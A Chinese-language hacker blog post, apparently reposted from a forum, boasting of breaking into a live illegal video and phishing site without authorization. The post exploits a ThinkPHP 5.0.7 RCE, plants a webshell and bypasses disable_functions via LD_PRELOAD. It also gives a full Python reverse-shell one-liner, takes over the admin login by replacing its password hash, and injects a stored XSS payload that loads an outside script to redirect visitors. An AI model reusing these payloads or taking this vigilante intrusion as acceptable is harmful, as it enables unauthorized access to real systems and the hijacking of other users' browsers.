前言

文章首发圈子,懒得重新编辑,直接转载。

身为chabug的一员,我@Y4er弟弟疯狂的输出文章,我羡慕嫉妒恨啊,来圈子快两个月了,没怎么发过文章,思来想去也就只有非法站可以为所欲为同时符合各位观众老爷口味了,是时候表演真正的技术了。

福利?钓鱼!

起因是因为我的挚爱,我一生的偶像c(谢)x(广)k(坤),日常浏览我坤微博,但是今天在评论区看到了这样一条评论“什么汁源都有哦@xxxx”,作为一名ikun(男人本性),我能允许这种评论在我爱豆的评论区出现吗!撸他!

图片是写文章后找的,想说的是现在各种社交app评论区都是乌烟瘴气。电脑打开链接,真的可以免费看吗?

网站只允许手机访问,chrome f12解决,点击播放

观察url结构,很明显tp框架,访问主域名,界面还挺好看的。

修改目录,报错,开了debug? 根据报错信息,得到tp版本,wdnm舒服了,5.0.7,rce直接怼他。

心想着直接getshell一条龙了,然而直接rce连shell发现连不上,当前目录竟然不允许写php,那直接执行命令好了。

此刻意识到可能有丶东西了,果不其然

思路很简单了, 写马连shell,bypass disable_functions。

Getshell + Bypass disable_functions

bypass disable_functions需要配合一些自己上传的文件,所以先想办法getshell,既然当前目录不能连不能写,可能是设置了权限,基友@lawliet发现/runtime/log目录可以写shell,果然是这样。

shell到手,利用LD_PRELOAD bypass disable_functions。

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

由于直径用bash -i反弹shell,命令中有 “&“导致url解析为参数,所以我选择了python直接弹shell,上传.sh脚本也可。

1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('vpsip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

失败的提权

udf提权(失败):

my.conf无写权限

脏牛等exp(失败):

gcc编译失败。

本地编译再上传,无权限运行。

suid等全部失败,本来想利用alias 修改ssh 获取root密码,想了一下不现实,当前用户是www,一是需要赋予/tmp/.ssh执行权限,二是alias只能修改当前用户,因此放弃。

到这里仔细想了一下,我们的目的到底是什么?提权后固然什么都可以干,但是或许我们要达到的目的不需要那么高的权限。

正义的仲裁

今天我也做一件正义的事情,在此之前呢,当然要给各位师傅留下点福利了?这种网站不会将视频保存在服务器上,并且会有很多代理,后台会有资源地址。接下来就是拿到资源,给各位师傅发福利。

root权限直接链接数据库,密码解不开,开始以为是过于复杂,新建账户发现也无法登陆。翻了一下在backup目录找到源代码,下载本地搭建。

默认密码admin888,复制数据库md5替换掉目标的密码,登陆之。

正规视频、禁止违法行为,我信了真的。开始写文章的时候才几百块,现在不到一个多小时就2.5k+?

真就举报封人家ip呗。查找到从微博获取的url中的代理用户信息,并登陆看看

为了帮助广大少年戒撸,没有root权限不能删站怎么办呢?xss!在统一资源库添加图片连接处发现存在xss,由于有宝塔title处不能插,所以利用前端引用图片src时进行xss。

payload:

1
x" onerror=document.body.appendChild(document.createElement('script')).src='http://website/runtime/fuck.js'//

效果:

跳转

搞定,所有该网站代理用户小电影链接全部跳转,我是不是又拯救了无数少年?

嗯!少年强则少女扶墙,不是,少年强则国强!!!

总结

写在最后,没有提权有些可惜,实力不允许,不然的话就舔着脸找团长申精了。我@Y4er弟弟白嫖百度云,我只能白嫖小电影了,唉差距。再有机会遇到有意思的站点还会在圈子里跟各位师傅分享,欢迎有骚姿势的表哥跟我交流指导~